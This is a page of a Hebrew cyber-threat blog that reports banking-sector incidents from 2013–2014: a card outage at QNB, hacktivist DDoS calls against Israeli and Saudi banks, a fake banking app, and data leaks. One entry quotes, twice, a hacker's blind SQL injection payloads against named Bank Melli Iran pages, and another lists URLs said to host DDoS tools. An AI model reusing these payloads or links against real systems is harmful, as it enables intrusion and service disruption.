בנקאות – עמוד 4

שיבוש בפעילות כרטיסי האשראי של הבנק הלאומי של קטר

20 אוקטובר 2014/ב בנקאות, פשיעה קיברנטית, קטאר /על ידי Tal Pavel

ב-17 באוקטובר התלוננו מספר מלקוחות (Qatar National Bank (QNB, באמצעות עמוד הטוויטר הרשמי של הבנק, כי נתקלו בבעיות בעת שימוש בכרטיס האשראי של הבנק וזאת ללא כל התראה מוקדמת.

בכתבה שפורסמה ב-Doha News ב-18 אוקטובר נמסר על לקוח אחד (chveneburo@) שהתלונן בחשבון הטוויטר של הבנק, אולם בפועל אותרו בתאריכים 17, 18 אוקטובר דיווחים גם של @ahmed_northern, @JonoH.

בדיקת חשבון הטוויטר של הבנק מגלה כי הדיווח הראשון היה בצהרי ה-17 בחודש;

כעבור זמן מה התקבלה הודעה מאת לקוח נוסף;

תגובת הבנק היתה בקשה כי הלקוח יצור עימם קשר;

אולם המקרה גרם לעוגמת נפש והתמרמרות בקרב אלו שדיווחו על כך;

עוד נמסר בידיעה כי מסתבר שארוע זה הקיף כאלף ממשתמשי הבנק אשר לא יכלו לעשות שימוש בכרטיסי האשראי של הבנק ובכלל זה ביצוע תשלום ומשיכת כספים, במשך מספר שעות. כמו כן דווח כי דובר הבנק מסר כי "ההפרעה הפתאומית היתה בשל בעיית רשת, אשר גרמה להשבתה מוחלטת של כל שרותי הבנקאות של QNB", אולם לדבריו הבעיה תוקנה והרשת פועלת כסדרה.

עם זאת, לא פורסמה כל תגובה רשמית של הבנק, דבר שהוביל לתסכולם של לקוחות רבים במהלך סוף השבוע, כפי שבא הדבר לידי ביטוי בטוויטר;

וכן המלצה להצטייד במזומנים בטרם יציאה מהבית;

מהתגובות השונות עולה כי ארוע זהה התרחש בדצמבר אשתקד ללקוחות בנק HSBC;

קספרסקי: דאגה במגזרי הפיננסים והבריאות מהכנסת טכנולוגיה של וירטואליזציה

19 ספטמבר 2014/ב בנקאות, בריאות /על ידי Tal Pavel

ב-17 בספטמבר פורסם דוח חדש של חברת קספרסקי לפיו מסקר שנערך בקרב 3,900 מומחי מערכות מידע ברחבי העולם, עולה כי מגזרי הפיננסים והבריאות הם אלו אשר יטו יותר מהאחרים לראות בשיקולי אבטחה מחסום בפני יישום טכנולוגיות של וירטואליזציה.

50% מהנשאלים מהמגזר הפיננסי הסכימו כי שיקולי אבטחה ימנעו אימוץ של טכנולוגיות וירטואליזציה, לאחריהם 49% מהמשיבים ממגזר הבריאות, זאת בהשוואה לממוצע של 40% בשאר המגזרים הלא תעשייתיים ו-43% בהכללת המגזרים התעשיתיים.

שני מגזרים אלו ידועים ככאלה המנהלים כמות עצומה של מידע רגיש ביותר על משתמשיהם ושניהם כפופים לחוקים וכללים מחמירים להגנת המידע ולגישה אליו. בנוסף, שני מגזרים אלה, ממוקמים במקום הגבוה ביותר בהיקף דרישות תאימות; 40% ו-38% לעומת ממוצע של 27% ביתר המגזרים. המחקר מעלה את האפשרות כי סוגיית דרישות התאימות יכולה לעמוד מאחורי מה שנתפס כ"שיקולי אבטחה" בהקשר זה. עם זאת בשני מגזרים אלו לא נרשמה דאגה שכזו בדבר מכונות וירטואליות שכבר מצויות ברשותם. מבין המשיבים מהמגזר הפיננסי, רק 16% מיקמו את "אבטחת תשתית הוירטואליזציה" כדאגה העליונה בתחומי אבטחת מערכות מידע, ורק 12% במגזר הבריאות, בהשוואה ל-14% בממוצע הכללי. המחקר מסביר את השוני בנתונים בגישה של "אם זה עובד, אל תתקן זאת". כלומר, נטיה להכיל את הקיים, אך לחשוש מקבלת החדש.

במחקר קודם של החברה התגלה כי לפחות רבע מהנשאלים גילו חוסר הבנה או הבנה חלשה בדבר אפשרויות האבטחה בתחום הוירטואליזציה, בעוד מרבית התשתית הקיימת בתחום זה אובטחה על ידם באמצעים מסורתיים בהם נעשה שימוש לאבטחת נקודות קצה פיזיות. לאור זאת ניתן להניח שתשובת מומחי מערכות המידע מתחומי הפיננסים והבריאות בדבר דאגתם מהוספת פלטפורמות וירטואליות לרשתות שלהם, נובעת מהצורך לנקוט בצעדי אבטחה יעודיים לתחום זה, דבר שהם ככל הנראה לא שולטים בו בצורה מלאה.

טענה בדבר תקיפה מקוונת של אתר הבורסה הסעודית

20 אוגוסט 2014/ב בנקאות, השבתה, ערב הסעודית /על ידי Tal Pavel

בשעות הבוקר של ה-20 אוגוסט פורסמה הודעה בדבר תקיפה קיברנטית אשר בוצעה מספר שעות קודם לכן על ידי שתי קבוצות האקטיביסטים נגד אתר הבורסה של ערב הסעודית.

ההודעה מציינת כי לדברי התוקפים הפעולה בוצעה כתגובה על "התמיכה הכספית של ערב הסעודית בזוועות הישראליות ובמחאה על אלימות המשטר הסעודי כלפי אסירים במדינה". עוד נטען כי בעקבות התקיפה המיוחסת ל-Izzah Hackers, Al-asefa Al-horria, Anon Arab Ops וכן 04xd, היה אתר הבורסה בלתי נגיש בחלק מהאזורים לכשעתיים.

בהודעה נמסר כי "הזהרנו את המשטר הסעודי להפסיק את תמיכתו בטרוריזם ולהפסיק להפר את זכויות האדם, אחרת המבצעים הבאים יהיו מתוחכמים וחזקים יותר", כמו כן דווח כי קבוצות נוספות הביעו את מוכנותן לקחת חלק בהתקפות הבאות, תוך אזהרה כי הפעולה היום נגד הבורסה הסעודית היתה רק אזהרה.

קריאה לתקיפה מקוונת של בנקים בישראל

11 יולי 2014/ב OpIsrael, בנקאות, השבתה, ישראל, מבצע צוק איתן /על ידי Tal Pavel

בבוקר של ה-11 יולי פורסמה הודעת טוויטר הקוראת להצטרף לפעילות OpIsrael ולקישור המופיע בהודעה זו. הקישור מפנה לעמוד מה-4 יולי 2013 ובו פרטי בנקים רבים מהמערכת הבנקאית בישראל.

עמוד זה כולל הפניה לקישור לא פעיל וכן לשלושה קישורים בעלי סיומת סינית;

http://tp.bjcg.gov.cn/ddos.html

http://caiwu.blcu.edu.cn/ddos.html

http://hqfw.sicau.edu.cn/ddos.html

TheWeekOfHorror – האקרים תוניסאים נגד מערכת הבנקאות של ארה"ב – 5-12 ביולי

4 יולי 2014/ב Tunisian Hackers Team, ארה"ב, בנקאות, השבתה /על ידי Tal Pavel

בהמשך לכתבה שהתפרסמה ב-16 ביוני והתייחסה בין השאר להתקפה צפויה של Tunisian Hackers Team נגד בנקים בארה"ב בשבוע שבין ה-5 וה-12 ביולי, הידיעה הפנתה להודעה של אלו מה-12 במאי ובה פרוט הבנקים שיותקפו, מועדים ומשך התקיפה. זאת תוך פרוט המניעים לכך;

ב-4 ביולי פורסמה הודעת תזכורת מטעמם, תוך הפניה לארוע בפייסבוק שנפתח על ידם ככל הנראה באותו היום.

כמו כן נעשה שימוש לשם כך בתגית הטוויטר #TheWeekOfHorror, אשר הוחל השימוש בה ב-12 באפריל, עם פרסום סרטון ביוטיוב על ידי XhackerTN.

חשד לאפליקציה מזוייפת של בנק מזרחי

26 יוני 2014/ב בנקאות, הנדסה חברתית, ישראל, רוגלה /על ידי Tal Pavel

בידיעה מה-24 ביוני בבלוג של חברת Lookout נמסר כי עלה בידם לגלות אפליקציה בנקאית ב-Google Play אשר נועדה לגנוב את פרטי הגישה של המשתמשים בה, אך למרבה הפלא לא את ססמאותיהם.

אפליקציה זו, אשר נקראה BankMirage, כוונה נגד לקוחות בנק מזרחי. נטען כי התוקפים עטפו את האפליקציה המקורית של הבנק והפיצו אותה מחדש, תוך התחזות לאפליקציה הרשמית של בנק זה.

אפליקציה זו יצרה מתקפה מסוג "דיוג"; משעה שהותקנה ונפתחה, הנוזקה העלתה טופס כניסה אשר שימש להזנת פרטי הכניסה של המשתמש. אולם באמצעות הונאה זו נגנב רק שם המשתמש ולא סיסמאתו וזו באופן מכוון. עם הזנת שם המשתמש, הוצגה בפניו הודעה לפיה הכניסה למערכת נכשלה וכי עליו להתקין מחדש את התוכנה של הבנק מ-Google Play.

החברה מסרה כי לאחר שהסבה את תשומת לב Google לאפליקציה, זו הוסרה.

הודעה על התקפה נגד אתר בנק ישראל

2 אוגוסט 2013/ב Tunisian Hackers Team, בנקאות, השבתה, ישראל /על ידי Tal Pavel

בתאריך 1 באוגוסט פורסמה הודעה מטעם Tunisian_Hàckers ובה קריאה לתקוף את אתר בנק ישראל בתאריך 2 אוגוסט בשעה 21:00 (GMT).

לצד כתובת הקבוצה בפייסבוק, מצויה בהודעה הפניה לארוע של הקבוצה בפייסבוק אשר נפתח ב-25 ביולי והנושא את השם OpTunisia ובו הודעות על מתקפות שונות, בעיקר בתוניסיה. הדף כולל הפניה להודעה הנדונה בדבר ההתקפה ב-2 באוגוסט על בנק ישראל, אולם ניתן לראות כי כבר יום קודם לכן תואמו ובוצעו התקפות נגד אתר הבנק;

האקר ישראלי טוען כי פרץ לאתר בנק איראני

15 יוני 2013/ב איראן, בנקאות, האקרים ישראליים, הדלפה /על ידי Tal Pavel

ב-13 ביוני פרסם ההאקר הישראלי Amenefus הודעה ובה פנה ל-An0nGhost ולתושבי איראן בטענה כי עלה בידו לפרוץ לאתר של Bank Melli Iran. להוכחת דבריו הוא פרסם את הפרטים הבאים;

Target; wWw.BMi.iR (Bank Melli Iran)

Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]

Blind SQLi 1;

http://bmi.ir/fa/objectslist.aspx

————————————————————————————

|GET input tid was set to -1' or 67 = '65 |

|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |

————————————————————————————

Blind SQLi 2;

http://bmi.ir/fa/publishlist.aspx

————————————————————————————

|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1' or 36 = '34 |

|POST /fa/publishlist.aspx?cid=0&page=2 |

————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.

13 июня, израильский хакер, известный как "Amenefus", опубликовал заявление об успешном взломе сайта иранского банка " Bank Melli Iran". Для подтверждения он опубликовал следующие данные:

Target; wWw.BMi.iR (BankMelliIran)

Look kids(=An0nGhost). this is how to SQLi a bank in Iran.[!]

Blind SQLi 1;

http://bmi.ir/fa/objectslist.aspx

————————————————————————————

|GET input tid was set to -1′ or 67 = '65 |

|code: POST /fa/objectslist.aspx?cid=5&smnuid=34&tid=-1%27%20or%2067%20%3d%20%2765 |

————————————————————————————

Blind SQLi 2;

http://bmi.ir/fa/publishlist.aspx

————————————————————————————

|POST input ctl00%24Footer2%24ImageButtonRSSFeed was set to -1′ or 36 = '34 |

|POST /fa/publishlist.aspx?cid=0&page=2 |

————————————————————————————

succeed with SQLMap, nMap, Havij, BlindCat.

אזהרה מפני תקיפת אתרים ישראליים

2 יוני 2013/ב בנקאות, השבתה, ישראל, תשתיות /על ידי Tal Pavel

בתאריך 29 מאי פורסמה קריאה לתקוף אתרי בנקאות וספקי אינטרנט בישראל;

כעבור יומיים פורסמה הודעה כללית בדבר התקפה צפויה על אתרים ישראליים;

OpPetrol – פריצה לאתר בנק סעודי

21 מאי 2013/ב OpPetrol, בנקאות, הדלפה, ערב הסעודית /על ידי Tal Pavel

בשעות הבוקר של ה-21 במאי פורסמה https://twitter.com/anonksa/status/336703224352477184 בטוויטר מטעם גורמים המזוהים עם "אנונימוס" בערב הסעודית בדבר פריצה שלהם שבוצעה לבנק Saudi Credit & Saving Bank.

הודעה זו הפנתה להודעה מפורטת המשייכת את הפריצה למבצע החדש עליו נודע בימים האחרונים OpPetrol# אשר עתיד להתבצע מטעם פעילי "אנונימוס" נגד 12 מדינות ב-20 ביוני השנה. ההודעה פותחת בכותרת "Fucked Saudi princes all" וכוללת כ-25 סיסמאות, שמות משתמש וכתובות מייל (בסדר הזה) השייכות לעובדי הבנק.

הפנתה

ביוני

קריאה להתקיף אתרי בנקים בישראל

9 מאי 2013/ב OpIsrael, בנקאות, השבתה, ישראל /על ידי Tal Pavel

בשעות הערב של ה-9 במאי הופצה בחשבון טוויטר המזוהה עם גורמי "אנונימוס" הודעה המפנה לעמוד אשר נוצר ב-7 באפריל הקורא לתקיפה מקוונת נגד אתרי בנקים בישראל.

העמוד כולל קישורים ל-17 גופים במערכת הבנקאית בישראל (15 בנקים וכן האתר של "פועלים שוקי הון" ואתר רשות הדואר) והכולל מספר נתונים אודותם.

בתוך כך אותרה בשעות אלה הודעה הקוראת לביצוע תקיפה מקוונת בטווח הזמן המיידי נגד את בנק יהב;

פרסום מספרי כרטיסי אשראי ישראליים

8 אפריל 2013/ב Tunisian Hackers Team, בנקאות, הדלפה, ישראל /על ידי Aviram Y

ב-8 באפריל קבוצת Tunisian Hackers פרסמה נתוני כרטיסי אשראי של ישראליים כולל כתובות IP.

עדכון מה-9 אפריל 23:15 – הודעה המקורית הוסרה מהאתר.